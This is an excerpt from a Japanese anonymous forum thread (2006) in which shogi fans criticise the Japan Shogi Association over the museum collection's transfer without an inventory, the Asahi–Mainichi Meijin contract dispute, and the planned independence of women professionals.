582 :名無し名人:2006/11/23(木) 18:44:31 ID:GG7uJ4ti
収蔵目録は木村家が持ってる(元々木村家の持ち物が多い)って話じゃなかったの?
少なくとも報道その他を見る限りではそんなことが書いてあったかと思うが。

583 :名無し名人:2006/11/23(木) 19:11:19 ID:JvhOkWXZ
>>582
目録は過去に2度作成されたが、どちらも将棋連盟は持っていない。
今年8月時点で「収蔵品の目録は作成中」だった(つまり存在しない)。
今は専任の学芸員がいない。よって11月現在も目録は未完のままと思われる。
2度目の目録作成の際に収蔵品をばらばらにしたため、寄贈者が誰だったのか
すでにわからなくなっている(「大橋コレクション」はこの世から消滅した)。
ソースは「続・続・続・将棋博物館の消滅について」 
http://black.ap.teacup.com/ransue/150.html

要するに、収蔵品目録が無いまま大阪商業大学にまるごと「寄贈」しようとしているのですよ。
目録が無いんだから何かが紛失しても誰にもわからない。

これだけでも呆れた話だが、>>578が「国宝級の盤駒を売りに出し」と書いているので
驚いてしまってね。いまの将棋連盟ならありえない話ではないと思って
もっと詳しく、とレスしたのです。

584 :名無し名人:2006/11/23(木) 19:23:59 ID:B78JtUxb
>>583
連盟が収蔵品を投げ出すと聞いて少々怒りを覚えていたが……
それ読んだら、連盟が投げ出した方が収蔵品にとっていいような気がしてきた。

585 :名無し名人:2006/11/23(木) 19:30:55 ID:mjPkIuPP
>>574
もしも理事がHPで博物館展示物を公開し始めたら、それに対して
批判するでしょここの住人はw
「そんなもん誰もみねーからサッサと売っちまえ。金の無駄だ」とかってw

586 :名無し名人:2006/11/23(木) 19:56:22 ID:NYjSKPMz
>>585
野球博物館を作った。
しかし、管理が面倒になた。
ベーブルースのバットも沢村栄治のグローブも他にやってしまった。

これと同じことをやったんだよ。

まだ、公的な機関に譲ったのなら、文句は少ないだろうよ。
最低な奴らだな。

まだ、こんな事を書くとは?釣りかな?それとも基地外のアルバイトかな。

587 :名無し名人:2006/11/23(木) 20:11:21 ID:9FQHzsEf
>>568 は良いこと言った。
まさにその通り。
連盟は一度破産して解散し、棋士をリストラした後、
新たに出直せ。


588 :名無し名人:2006/11/23(木) 20:32:57 ID:EuZoD2b9
年間数百人しか来なくて大赤字だったそうだからな。
批判してる奴は見に行って言ってるんだろうな?

589 :名無し名人:2006/11/23(木) 20:41:24 ID:mjPkIuPP
>>578>>581みたいにソースもないのに寄贈を売却にすり替えてる
奴じゃなくて、俺を叩くんだなw

いい加減連盟が何をしようと批判しかしないって認めればいいのに。

590 :名無し名人:2006/11/23(木) 20:54:57 ID:JvhOkWXZ
>>589
将棋博物館収蔵品の移管は大阪商業大学への「寄贈」のはずなのに
>>578が「国宝級の盤駒を売りに出し」と書いているから、もっと詳しく、と
レスをつけた。
>>581で書いた「収蔵品目録がない」件は>>583でソースを示してある。

これのどこをどう読めば「寄贈を売却にすり替えてる奴」ということになるのか?
匿名だからといって面前で言えないような失礼なことは書かないように。

591 :名無し名人:2006/11/23(木) 20:58:17 ID:gswneTUl
というかそもそも維持費にそんなかかるとは思えんのだが・・
連盟の将棋会館にあるわけだよね。
学芸員もいない・・となるととても博物館を維持しようと
努力したとは思えんし。
目録すら作成されてないってどんだけいい加減なんだよ。
目録のない博物館がどこにある?w誌ねや。
これじゃあ途中で売りに出したりなくなってたりしていても無問題だよな。
売却よりある意味しまつわるいぞ。

592 :名無し名人:2006/11/23(木) 21:11:24 ID:Yu5Z92wV
目録ないんですかと言われて「ええ? そんなもの必要なんですか」と答えるレベルだからw

593 :名無し名人:2006/11/23(木) 21:19:56 ID:2SuXISUg
ああ、ツカレル!明るい話題ないの?

594 :名無し名人:2006/11/23(木) 21:26:31 ID:Q+R6av+W
ない。

595 :名無し名人:2006/11/23(木) 22:12:18 ID:yj3pNoY0
普通、寄贈する際に目録を作ると思うけどなあ。
あとで問題になったりしても困るわけで。あげた/もらってない。
「収蔵品目録がない」そうだけど、と、とぼけてる可能性もあるのでは。

博物館に人が来なかったのは当然だよね。
そんな風にはファンを教育してこなかったんだから。

学芸員は、かつてはいたってことみたいね。


596 :名無し名人:2006/11/23(木) 23:03:47 ID:oes/YJlY
まあ観に行く人間もいないのに博物館を運営するってのもおかしな話だわな。
価値の分かる人間の手に渡り、整理・再編纂されるのが良いと思われ。

597 :名無し名人:2006/11/23(木) 23:18:45 ID:77UsKmtN
30年間将棋界に一番金を出している毎日新聞に喧嘩をふっかける理事会。
好意で王将戦を維持してやっているのに、将棋脳は馬鹿だから
もっとも伝統ある、名人戦の価値が認められていないという考えになる。
30年前名人戦が戻ってきた時に、王将戦を廃止しておけば、
結果的に今回の問題はなかった。

序列1位でなくなった時に、読売新聞が契約金をそのままにするだろうか?

598 :名無し名人:2006/11/23(木) 23:53:16 ID:/M3jx2V0
>>596
それは思う。最終的に連盟の手を離れたのはよかったと思う。

もっとも、今回の名人戦問題が連盟の赤字が原因だとするなら、
そもそも財産の調査をする際に収蔵品の価値も当然調べなければいけなかったのだが。

599 :名無し名人:2006/11/24(金) 01:02:52 ID:GemhtnE+
もう秋田

600 :名無し名人:2006/11/24(金) 01:42:08 ID:binZRY5r
>>598
この状態だと金目のものはもう横領されて売り払われていると思われ。
別に将棋指しのモラルが特に低いといいたいわけじゃないよ。
寺や神社、大学や博物館でも表沙汰に出来ない不祥事はたくさんあるし。

601 :名無し名人:2006/11/24(金) 05:03:35 ID:Ny+zWsql
>>600
将棋の盤駒の類は美術品や芸術品の類と違って需要が少なく、市場も非常に小さいから
横領→横流しがあったとしたら、発覚とまでは行かなくても黒い噂は立ってたと思う。
売り払うにしても、囲碁と違って将棋ファンは貧乏人が多いから……。

602 :名無し名人:2006/11/24(金) 05:11:16 ID:2FgpKp/2
横流しはないかもしれないが、「紛失」はあると思う。

棋士や職員が博物館で
「これいいな貰っちゃおう」
→「やべー○○さんから頂いた駒がいつの間にかなくなってる・・」
→「目録が無いからどうせわかんねーし、そのまま寄贈しちまえ」

数年後、収蔵品が少ないことに将棋ファンは気づくが、寄贈目録が無いため
連盟が紛失したか大学が紛失したか、誰にも確認できずうやむやに・・



603 :名無し名人:2006/11/24(金) 05:45:55 ID:aRQUYskA
もうすぐ回答期限だねw

604 :名無し名人:2006/11/24(金) 06:50:28 ID:Geytdzw/
「名人戦の真実」、キター!

http://www.shogi.or.jp/

605 :名無し名人:2006/11/24(金) 08:20:24 ID:TQP6JTrY
>>604
しばらく見ない間に将棋連盟のHPずいぶんキレイになったね。

606 :名無し名人:2006/11/24(金) 17:49:09 ID:Iu7pPqX4
理事会が検閲しているだろうから、連盟に不利な内容は出てこないだろうな

607 :名無し名人:2006/11/24(金) 17:51:21 ID:CoOgMtsa
検閲というか制作総指揮だな。

608 :名無し名人:2006/11/24(金) 17:52:16 ID:Vckwvu4V
まあこういうのは意味ないよ。ファンの声とか載せるんなら
まだ意味あるんだろうけど。
又どうせ言い訳のオンパレードだろ。真実って・・恥ずかしくねえか?w

609 :名無し名人:2006/11/24(金) 17:58:15 ID:j0x7uR8X
寄贈されたものをどうしようと自由、という考え方は、寄贈者の信頼を
裏切ることになろう。
おろそかにされることはない、と信じて寄贈をするものなのだから。


610 :名無し名人:2006/11/24(金) 17:59:53 ID:RiDdYxPS
将棋の本は正直だな。
あんまり恥ずかしいから表紙が真っ赤になっているよ。

611 :名無し名人:2006/11/24(金) 18:03:23 ID:rAw6JrkD
「名人戦の真実」って、まだ終わってねぇじゃねぇかw
また、朝日単独案に戻らざるを得ないとかなんとか、
お得意の幻想の解釈始めちゃったし、店開きっぱなしで、収束図見えず。
こういう時期に交渉相手を刺激しない方が、得策と思うんだが・・・、
ああ、あくまでこれは一般論ね。
一般論が通じるような人達じゃないことは、もう、百も承知。二百も合点してまする。

612 :名無し名人:2006/11/24(金) 18:04:08 ID:Geytdzw/
名人戦の真実っていうか、問題の本質は、この板で語られ尽くした
感があるよな。
舞台裏という意味では、連盟より、新聞社内部の事情の方が、一般
に知られていない。

613 :名無し名人:2006/11/24(金) 18:50:57 ID:CoOgMtsa
読んでみて仰天、昔の毎日→朝日、朝日→毎日移籍の内幕話に終始、
編集後記で「さて、名人戦は朝日新聞社、毎日新聞社の共催という
形で新たに生まれ変わろうとしています。現在両社と将棋連盟で最終的な契約にむけて詰めているところです。はてさて、どうなりますか。」
なんて書いてあるだけだったら見上げた根性なんだが。

614 :名無し名人:2006/11/24(金) 20:53:53 ID:Bu9dXE2X
読んでみて仰天、昔の「突撃しまーす」の内幕話でごまかし、
編集後記で「さて、H葉さんは、自己破産して、
新たに生まれ変わろうとされてます。現在女流棋士復帰と将棋教室の仕事を切望されているところです。はてさて、どうなりますか。」
なんて書いてあったら、見直すかもしれないw

615 :名無し名人:2006/11/24(金) 20:56:33 ID:Czo9r7Ur
>>611
1月号「名人戦の真実」←いまここ

3月号「続・名人戦の真実」

5月号「帰ってきた名人戦の真実」

7月号「またまた名人戦の真実」

9月号「名人戦の真実リターンズ」

11月号「名人戦の真実・完結編」

そして2008年1月、連載をまとめた「名人戦の真実 Remixes」発売。
これくらいのことはやらないと。

616 :名無し名人:2006/11/24(金) 21:03:05 ID:j0x7uR8X
そして2008年3月「真・名人戦の真実」で新たな展開が

617 :名無し名人 :2006/11/24(金) 21:05:15 ID:T1zfRp+w
恥の上塗りのような特集だな。立ち読みする気にもならんが。

618 :名無し名人:2006/11/24(金) 21:47:46 ID:Vckwvu4V
もう何ヶ月にもなるんだが、
最強の一手ま〜〜〜〜〜だ〜〜〜〜〜〜。
やっぱホラかw

619 :名無し名人:2006/11/24(金) 22:01:31 ID:+g545tAn
8億要求は最強の一手だろ、正直俺は痺れたよ。
なんと言うか勇気だけはかうよw

620 :名無し名人:2006/11/24(金) 22:06:53 ID:Vckwvu4V
え、それのことだったの?最狂の一手じゃんw

621 :名無し名人:2006/11/24(金) 23:13:49 ID:fSAdFpqJ
>>620
座布団一枚!

622 :名無し名人:2006/11/25(土) 03:28:00 ID:vKnMFQIp
片上の将棋世界での連載が12月号で終了となった。片上はもっと続けたかった
というニュアンスで文中不満を表明しているが、これってやっぱ※の鶴の一声
で降ろされちゃったのかな。
片上は何となく毎日支持派のような感じだし・・・

623 :名無し名人:2006/11/25(土) 09:17:11 ID:7CpJ0QTf
8億はひどいものだね。
× 将棋指しは日本の文化
○ 将棋指しは日本の馬○

いまごろ朝日、毎日、読売新聞怒り心頭に

624 :名無し名人:2006/11/25(土) 09:56:23 ID:nlq1qZyB
※と仲がいい石原も海外視察で金使いまくってるな。
税金無駄遣いスンナよ。
類は類を呼ぶというか・・。

625 :名無し名人:2006/11/25(土) 13:11:34 ID:cuBM47cQ

>どっちかというと、女流棋士の数が少な過ぎてイベントの仕事が多いのに、
>待遇(ピンハネ率とか)が悪いんじゃなかったっけ?
>女流棋士はやめないが、女流棋士会をやめるのはその為とか。
>女流棋士会通さず自分のコネで仕事を取った方がいいとかで。

 って話だったが、女流全員で出て行くことになったわけだ

将棋連盟から女流棋士が独立…来春にも自主運営
ttp://headlines.yahoo.co.jp/hl?a=20061125-00000096-sph-soci

 名人戦騒動を筆頭にカネカネ言い出したのはこういう動きも察してたからかな

626 :名無し名人:2006/11/25(土) 14:26:00 ID:gSyE3ro0
>>625
>名人戦騒動を筆頭にカネカネ言い出したのはこういう動きも察してたからかな

それはありえる話だね。
4月の女流棋士総会に出席した米長は「自立」がどうのと演説している。
総会前に女流独立の動きを察知して、遠回しにプレッシャーかけたのかもしれん。
米長ってそういう権謀術数的なかけひきが大好きだから。


> 4月14日に女流棋士総会がありました。総勢約50名ですが、当日は30名以上の参加でした。
> 米長会長、西村専務の2人が出席。私が10分程話をして、それからは活発な
>質疑応答で、大変貴重な1時間20分でした。
(中略)
> 私は当日「行乞」と「自立」について説いてきました。行乞というは、ファンサービスをして
>対価としてのいくばくかの謝金のことです。それにはプロ棋士、支部長、普及指導員、
>愛棋家などとの交流を深め、広めること。それにより指導やらが生ずるからです。
> 自立というは、心の独立という意味です。将棋ファンの大半は男性で、中高年か子供が
>多いのです。当然女性がモテるわけで、女流棋士の活躍の場はいっぱいある。その場を
>活かすためには自分で、あるいはチームを作って仕事を取ってくるということが大事なのでしょう。

627 :名無し名人:2006/11/25(土) 14:29:38 ID:gSyE3ro0
>>626
引用のソースは移転前(Nifty)の米長邦雄ホームページの「将棋の話」。

628 :AAE資料屋 ◆AAEdataUQQ :2006/11/25(土) 22:53:00 ID:KRD+0IA2

日経「将棋名人戦、朝日と毎日が共催で合意・契約金は折半」
ttp://www.nikkei.co.jp/news/shakai/20061101AT3G0101M01112006.html

朝日「将棋名人戦共催、本社が毎日新聞社と基本事項で合意」
ttp://www.asahi.com/culture/update/1101/017.html
毎日「連盟とは正式な協議に入っておらず、金額について了承したこともない」
ttp://www.mainichi-msn.co.jp/today/news/20061102k0000m040068000c.html

将棋連盟、6億6000万円提示・名人戦共催の朝日と毎日に
ttp://www.nikkei.co.jp/news/shakai/20061109AT1G0803308112006.html
名人戦契約金 年 各2億円(5年契約)
名人戦振興金 年 各3000万円(5年間)
 普及協力金  年 各1億円(5年間)
    (小計    年 6億6000万円)
王将戦契約金 年 7800万円以上
朝日オープンに代わる新棋戦契約金 年8000万円
                               ◎総額 年8億1800万円以上
ttp://hobby.nikkei.co.jp/shogi/news/index.cfm?i=20061109s1000s1

連盟の公式見解
ttp://www.shogi.or.jp/osirase/061101meijin.html
 将棋名人戦の共催合意について
 名人戦共催につきまして毎日新聞社と朝日新聞社が合意されましたことを歓迎いたします。
 先日、日本将棋連盟より提示しました契約金ほか総額についても、
 おおむね了承されたことに感謝いたしております。
 以上、よろしくお願いいたします。
  2006年11月1日 社団法人日本将棋連盟 広報担当理事 西村一義
将棋世界1月号は12月2日発売予定(大特集・名人戦の真実)

629 :AAE資料屋 ◆AAEdataUQQ :2006/11/25(土) 22:54:26 ID:KRD+0IA2

他に普及協力金が関わりそうな問題


●24買収
ttp://www.shogi.or.jp/osirase/061110_24.html


●女流棋士問題
将棋連盟から女流棋士が独立…来春にも自主運営
ttp://headlines.yahoo.co.jp/hl?a=20061125-00000096-sph-soci
将棋連盟から女流棋士が独立…来春にも自主運営
ttp://hochi.yomiuri.co.jp/topics/news/20061125-OHT1T00096.htm
女流棋士会、将棋連盟からの独立検討・1日に臨時総会
ttp://www.nikkei.co.jp/news/main/20061125AT1G2501625112006.html

将棋連盟から女流棋士が独立…来春にも自主運営
http://game9.2ch.net/test/read.cgi/bgame/1164404710/


資料館の話が出ていましたが、
日本棋院は広くてスカスカなので囲碁殿堂資料館が楽に置けるそうです。
女流独立問題ですが、現実には連盟と絶縁しそうになった場合、
対局場の確保、マネージメント、事務の人材……等々問題が多いのですが、
「中国棋院は象棋もやってるし、日本棋院の中に女流将棋部を」ってのが
冗談から脅しの材料くらいに昇格したような気がしました。
 ↓
囲碁殿堂資料館は、ちょっとねえ
ttp://blog.livedoor.jp/ota416/archives/50726713.html

630 :名無し名人:2006/11/26(日) 10:30:06 ID:UZEiT2H+
>>628
なにこれ
金額に対しては協議自体してないし了承もしてないって
朝日毎日が言ってるじゃん。

631 :名無し名人:2006/11/26(日) 12:40:51 ID:GFuby/mU
連盟「8億に決まり」
朝日毎日「そんなこと言ってない」
でその後の、対応で理事会で大激論になったらしいが、
押し通すことで一枚岩になったそうだ

女流棋士の独立って連盟にとっていくら位のマイナスになるんだ?

632 :名無し名人:2006/11/26(日) 16:47:32 ID:x4N6qhSL
しかし、将棋で8億だと囲碁もだまってないだろうね。
囲碁の名人戦やその他の棋戦も当然ながら値上げ要求してくるだろう。
製紙会社も新聞用紙値上げ要求。
印刷会社も印刷代値上げ要求。
運送会社も運賃値上げ要求。
販売代理店も配達費値上げ要求。

633 :名無し名人:2006/11/26(日) 17:43:23 ID:PDdYnZHJ
2月号 「将棋倶楽部24買収の真実」
3月号 「将棋博物館閉鎖の真実」
4月号 「女流棋士会独立の真実」
5月号 「名人戦交渉決裂の真実」


634 :名無し名人:2006/11/26(日) 18:59:27 ID:ZWSgWCye
で、「名人戦開催休止の真実」が載るのは何月号?

635 :名無し名人:2006/11/26(日) 20:41:33 ID:JklusYT/
女流独立は米長同意の上でのリストラと言う説も出てるな、
逃げ出すのか、追い出されたのか、どっちだろう。
ただ、弱いが金を取っている女流を切ったならば、
名人戦の順位戦や他の予選で弱いプロの対局料を減らす名分ができる。
「羽生から賞金をピンハネして財政再建」ってギャグは実行に移したし、
「女流将棋部を日本棋院」とならんといいが。

636 :名無し名人:2006/11/27(月) 00:09:02 ID:ewXWuNKR
将棋だけ値上げなんて絶対に許さーん。
将棋に出すなら囲碁にも普及協力金出すのがすじ。

637 :名無し名人:2006/11/27(月) 00:33:56 ID:BQnMPslt
普及協力金という性格の支出だと、法人税法上損金とならない可能性がある。
指定機関以外の一般への寄付金は、損金として認められないからね。
その辺の問題整理を朝日・毎日はきちんとしているのだろうか?

最初、朝日が言い出した時点では、経理を通していないと思われるので、
後から、その辺りの問題がネックになっているのではないだろうか?
場合によっては、国税庁に事前に承認を求めなければならないことになる。
もっとも、国税庁に掛け合っても駄目なものは駄目という答が想定されるが・・・、

638 :名無し名人:2006/11/27(月) 12:09:49 ID:L9I1nfZi
その辺の整理が出来てないのもあってツメに間がかかっているんだろ?
ていうか本当に交渉してるのかな。連盟のやりかた見てると三者でテーブルに付いてっていうのが想像できないんだが。。
連盟抜きで2社で協議しているって言うのも何か変だしね。
将棋博物館閉鎖を見ても「文化振興拠出」としての資金にとしてはどんどん魅力がなくなっている

639 :名無し名人:2006/11/27(月) 13:08:02 ID:H6U3Yij0
>将棋博物館閉鎖を見ても「文化振興拠出」としての資金にとしてはどんどん魅力がなくなっている

魅力じゃなくて根拠がなくなっているのでは?
博物館閉鎖だけならまだしも、収蔵品を全部よそに投げてしまう団体なんかに
文化振興名目で金出せないでしょ

640 :名無し名人:2006/11/27(月) 13:13:39 ID:H6U3Yij0
たとえば貴重な棋譜・文献や盤駒があったとして、
それを今の将棋連盟に寄贈しようなんて人はもう皆無でしょう
寄贈しても勝手によそに投げてしまう団体だとわかってしまったので
ということで文化名目での資金援助もできない
今後連盟に金を渡すなら、棋戦開催などビジネス関係限定ってことになるだろうね

641 :名無し名人:2006/11/27(月) 13:35:53 ID:HnUS+2k3
博物館のスペースが確保できないほど狭いのか、連盟?
まさか女流から会場使用料をとるとかいう話になるんだろうか。

女流独立騒動で変だなと思うのは、
ほとんど基本給を払わず、年金等もない女流棋士を独立させても経費削減にならない。
女流棋士派遣のピンハネの利益の方が大きかったろう。
大幅な収入減が名人戦騒動の一因になったとも言える。
ところが>>626を見ると連盟側から言い出したことのように見える。
発表がこともあろうに連盟vs朝日毎日で連盟が孤立した瞬間。
どうなってんだ!

642 :名無し名人:2006/11/27(月) 14:22:22 ID:6rsR0x/y
今、倉敷藤花をやっているが、
大山名人は、出身地の倉敷市を絡めて大山記念館を作ってるよね。
そこら、何もかも分かった上でやってるという感じがするね。
連盟に貴重な盤・駒なんぞを寄贈したらどういうことになるか。
ただぞんざいに放置されるのが落ちだ。挙句、散逸してしまうかもしれない。
会長職が長いだけにそういうところまで、すべてご承知という感じがする。
ちゃっかりしてると言えないこともないがw

その点、木村名人のご遺族の方々は、正直過ぎたんだね。
それは、結果が、すべてを証明している。
木村名人なら、いくらだって記念館を作れたろうに・・・、


643 :名無し名人:2006/11/27(月) 15:03:09 ID:gt1htFvh
>>626
> 自立というは、心の独立という意味です。将棋ファンの大半は男性で、中高年か子供が
>多いのです。当然女性がモテるわけで、女流棋士の活躍の場はいっぱいある。その場を
>活かすためには自分で、あるいはチームを作って仕事を取ってくるということが大事なのでしょう。

なんかこれ変
「自立とは心の自立だ」と言いながら「自分で仕事取ってこい」って
心じゃなくて経済的に自立しろっことじゃないか

女流は連盟のお荷物って米長会長は思ってたってことなのかねえ?
経済的にも身分的にも女流は連盟の保障をあまり受けてなかったそうだけど
女流の動きも、4月のこの米長演説も謎だらけだ

644 :名無し名人:2006/11/27(月) 19:02:59 ID:Vbd/wIfD
連盟そのものが、事実上崩壊しているのではないのかな。
倒産報道される直前の会社が、よく、こんな感じになるよ。

645 :名無し名人:2006/11/27(月) 19:33:16 ID:61XxjcVE
「将棋連盟、民事再生法申請の真実」

646 :名無し名人:2006/11/27(月) 19:45:03 ID:vw4f0Zt6
表に出てない大きな負債とか抱えてんのか?
ずーっとカネカネ言って、あげくに8億要求するし。
名人戦の共催が決まって財政が安定するかと思えば
女流は出て行くって言い出したのは何か情報握ってるんだろうか。


647 :名無し名人:2006/11/27(月) 19:55:55 ID:v3bjqnek
結局契約が合意に至らないまま年越しかね。
名人戦問題はまだ終わってないと見ると
いったいいつまで駄々こねるんだよって感じだね。
将棋界のイメージダウンはまだまだ続く。全部※のせい。

648 :名無し名人:2006/11/27(月) 21:18:59 ID:V+wJ4uNZ
何か勘違いして金が欲しくなっただけだろ。


649 :名無し名人:2006/11/27(月) 22:50:59 ID:kisoiLZu
こんな調子で、来期の順位戦は大丈夫なんだろうか。
観戦記のこと等を考えても、もうそろそろ決めないとまずいだろうに。

650 :名無し名人:2006/11/27(月) 22:54:45 ID:L9I1nfZi
元に戻すが連盟はどこにその金を使うか明示すべき。

651 :名無し名人:2006/11/27(月) 22:55:16 ID:4Zvx3Kp5
今年の連盟の動きで一番謎なのが理事会が一致団結している点だな
これは義理とか損得とか将棋脳とか痴呆とかでは説明が付かない
おそらくはまだ出てきていない話があってそれで結束しているんだろうか

652 :名無し名人:2006/11/28(火) 03:26:22 ID:YpC4pXYZ
>>643
※って文章による表現能力が極端に劣る奴だよね。
※の書いているものはいくら読んでも何を言いたいのか分からない上に、
論理的組み立てがまったく出来たいない。それに加えて世間知らずの
非常識だから言ってることや書いてることはいつもハチャメチャ。
※の書いた文章で理路整然とスッキリした分かりやすい文章ってのは
読んだことがない。
こういうのが東京都の教育委員をやってるんだから驚くけど、まぁ、
文章で飯喰ってるわけじゃないからしょうがないのか。

>>651
凸とか西村辺りは※に何か弱味を握られてる気がする。
凸はハヤシバ絡み、西村はNSN絡みか。
トラ、ヅラ、リチギは単に将棋脳で所謂馬鹿なためと思われる。

653 :名無し名人:2006/11/28(火) 03:53:21 ID:66ZJuKuX
>>652
>凸はハヤシバ絡み、西村はNSN絡みか。
>トラ、ヅラ、リチギは単に将棋脳で所謂馬鹿なためと思われる。

「将棋脳」という言い方をするなら、その筆頭は※凸なんだよねえ。
その2人が連盟のNo.1、No.2の座にいて舵取りしているのが混乱の元。
改革が必要なのはわかるがスポンサーを怒らせたりファンに不信感を抱かせるような
ことばかりしていたら、壊すばかりで後がなくなってしまう。
将棋に関していえば文句なしの天才であり一時代を築いた大スターだったんだが。
経営は経営のプロにお願いするのが本手。

654 :名無し名人:2006/11/28(火) 04:07:43 ID:q0n5iChl
弱みを握られてるからってすべてが免罪符になるわけでもないがな。
そこら辺が分かってないお前も将棋脳w

655 :名無し名人:2006/11/28(火) 04:34:35 ID:YpC4pXYZ
>>654
ハァ、誰が免罪なんて言ったんだよ。
パシリばっかりやってっから弱味を握られてそうだって言っただけだろ。
お前のその思い込みの強いところは正に(ry

656 :名無し名人:2006/11/28(火) 10:10:48 ID:nsSiJcN6
年々減り続ける将棋ファンの傾向を見れば、今まで以上に投資する価値がないことをなぜ毎日、朝日は気付かないのか?
将棋普及に力を注がず、アマプロ間に壁を作り、閉鎖的世界で安穏と生きてきたつけが回ってきたわけだな。
連盟が破綻するのも時間の問題だよ。

657 :名無し名人:2006/11/28(火) 14:02:41 ID:G8MOXaUP
30年前同様、交渉がもつれ順位戦休止。
歴史は繰り返す。
前回は、要求が認められないなら、名人戦は将棋世界で自主興行。
ずいぶん勇ましかった。w

658 :名無し名人:2006/11/28(火) 22:31:15 ID:HXsnJWcZ
将棋の契約金が値上げになれば、当然囲碁も黙ってない。
年間数億円もの経費UPは、どこかで補填しなければならない。
結局のところシワ寄せは、最弱者である販売店の新聞少年へ。

659 :名無し名人:2006/11/28(火) 23:20:36 ID:PzQdbrsh
連盟もそうだが、毎日や朝日の経営難ってのがどのくらいなのか分からんからなあ

660 :名無し名人:2006/11/29(水) 05:59:02 ID:cyznR4Na

首都圏の人はリコー杯ペア碁選手権(男性棋士と女性棋士が交互に打つ)見てきたらどうよ?
男女両方の囲碁トップ棋士を一度に見られるじょ。
12/02(土)開幕。

第13回リコー杯ペア碁選手権
http://www.pairgo.or.jp/RICOH/index.htm
大会レポート2007(まだ組み合わせ抽選会のみ)
http://www.pairgo.or.jp/RICOH/2007/report.htm
大会レポート2006
http://www.pairgo.or.jp/RICOH/2006/report.htm

661 :名無し名人:2006/11/29(水) 09:56:24 ID:ze6o/6uV
>>658
新聞販売店関係者が愚痴を書くスレ14梱包目
http://society3.2ch.net/test/read.cgi/mass/1163062445/

662 :名無し名人:2006/11/29(水) 10:47:05 ID:lG2m3tOo
広告費全体はあまり変わらないがそのパイが、新聞→ネット、になってる。
実際、四国新聞が撤退、大和証券杯ができたわけだし。
朝日や毎日の相手はさっさと切り上げてヤフーに力を注いだ方がいい……
と思ってたけどな、羽生のネットのやつを見るまでは。
しかし、全体としての流れはそっちだろ。

663 :名無し名人:2006/11/29(水) 11:24:30 ID:kGXtblEZ
>>662
311 :名無し名人:2006/11/10(金) 10:31:14 ID:Ic81qcvs
「底のない泥沼」と秋山社長も嘆く「朝日新聞の惨状」
朝日新聞・秋山耿太郎社長、OB・本郷美則
週刊新潮(10/26)
1998年に2000億弱だった広告収入が激減し、
2005年で500億減の1400億強。

朝日新聞名人戦共催の理由、500億の収入減。
やっぱり名人戦やめますとなれば大爆笑。

広告収入が500億円も減ったから名人戦どころではないと
文化部の独走を財務部が牽制したのが真相かな
で、毎日と共催で運営費を浮かそうと
ところが理事会が8億要求したから大騒動
半年経ってもまとまらず、連盟が頭を下げなきゃ
このまま名人戦は宙に浮く。十段戦のときと同じで
両社とも現行の棋戦を続ければ紙面は埋まるから困らない。


664 :名無し名人:2006/11/29(水) 15:29:13 ID:pHcV2aIF
広告は、日経が案外強い。
広告ならぬ公告を押さえているからね。新株式の発行とか、そういうやつ。
これが、結構、馬鹿にならない。全国紙では、ほぼ独占状態だからね。ライバルが官報w
しかし、それも、ネット化の動きがあるそうだ。従って、日経も頭が痛い。

この前のナントカ通信みたいに詐欺的な全面広告も出ちゃうし、サラ金の広告も問題視されてる。
広告主は大事なお客様なのだが、そういう広告主となると新聞も社会的な責任の一端を問われる。
片方で社会的公器だなんて綺麗ごとほざいてるからね。急に本音も吐けない事情がある。
ちょっと、新聞社の未来は、暗いんでね?
若い世代の中には、ニュースもネットで済ましちゃってる人も多くなってきてるようだし。

665 :名無し名人:2006/11/29(水) 20:43:55 ID:97K1R5D5
朝日も毎日も早く2億円づつで受けます、普及金その他は支払いません、って発表汁

666 :名無し名人:2006/11/30(木) 11:27:53 ID:NxGMEoCd
>642

女流は変に東京の地価・人件費の高いとこに事務局をおかずに倉敷の大山
記念館に事務局業務を委託すればいい。
IPの普及で電話代は地方でも都内でもさしてかわらない。
専従を雇わなければ、固定費も低い。
さらに倉敷側にも女流連盟の本部があるのは嬉しいだろうし、藤花戦も
続くだろう。

東京では対局会場だけ借りればいいよ。
ライオンズとかロータリーとかがよくホテルで例会をやっているじゃない。
あの乗り。
女流将棋の毎月の月例対局日をあらかじめ決めて集中対局にすれば経費も
交通費も助かる。

それ以外の日程でやりたい(と主催者が言った場合には)会場もすべて
当該新聞社任せでいいじゃない。都内にはだいたい、社員用の福利厚生
施設(寮という名前の料亭みたいなの)を持っているから、そこの
和室でいいと思うよ.


667 :名無し名人:2006/11/30(木) 18:17:11 ID:Z61V/cjy
>>666
スレ違いだけど、女流も殆んどが首都圏に住んでるんだから
倉敷なんかに拠点を置くなんて無理だよ。
置屋スタイルにして都内に小さな事務所を借り、交代で
電話当番すれば良い。
お声が掛かったら登録順に派遣する。
これで結構食っていけると思う。


668 :名無し名人:2006/11/30(木) 18:32:20 ID:RsXYHzB6
666はこれから夜行バスにいやいや乗るだれかさん

669 :名無し名人:2006/11/30(木) 20:26:21 ID:v+a69kMw
将棋世界の「名人戦の真実」が、スポンサーやファンの感情を逆なでする
ような内容のような気がしてならないのだが。
朝日、毎日が、記事の事実関係を否定するコメントを出して、交渉が決裂
するような展開になったりしないだろうか。

670 :名無し名人:2006/12/01(金) 16:40:30 ID:eoPc90/j
どっかの芸能プロにスケジュール調整というか、
マネージメントは丸投げするんじゃないか、
ヒカルの碁の原作者なんかそうらしいし。
日本棋院に所属するのが一番確実だろうけど、さすがになw

671 :名無し名人:2006/12/01(金) 16:51:40 ID:puRaYIS2
>>670
もし女流が日本棋院に所属したら、連盟にとってはさすがに屈辱的だろうからね。
メンツ丸つぶれというか、逆ギレするというか。

最も本音は、連盟全体での日本棋院への吸収合併かもしれないけど。

スピードスケートがフィギュアスケートに食わせてもらっているのと同じことが狙えるから。

672 :名無し名人:2006/12/01(金) 16:54:29 ID:hI9yK5OZ
>>671
囲碁・将棋クラブかよ。

673 :名無し名人:2006/12/01(金) 23:10:42 ID:f7LkxJcm
日本将棋連盟は来年4月1日をもって女流将棋協会に吸収合併されます

674 :名無し名人:2006/12/02(土) 05:21:36 ID:Yt+OqbUz
>>662
yahooも相当やばいんだけどね。ボーダフォン買収以前から

675 :名無し名人:2006/12/02(土) 06:38:45 ID:hRhug4u5
>>670
梅沢由香里のことを言っているのだろうが、彼女はもちろん「ヒカルの碁」の
原作者ではなく監修者。

676 :名無し名人:2006/12/02(土) 12:19:18 ID:APoHCrO+
各棋戦の女流枠はどうなるんだろう。
名人戦にも挑戦者枠を要求してくるんだろうか。
日本棋院に所属というより、日本棋院御用達の(梅沢が使ってる)芸能プロに所属、
みたいな形になるんじゃないだろうか。ノウハウ持ってるだろうし。

677 :名無し名人:2006/12/02(土) 12:51:37 ID:t9N3/KOr
高橋和はタレント事務所所属だが(以下略

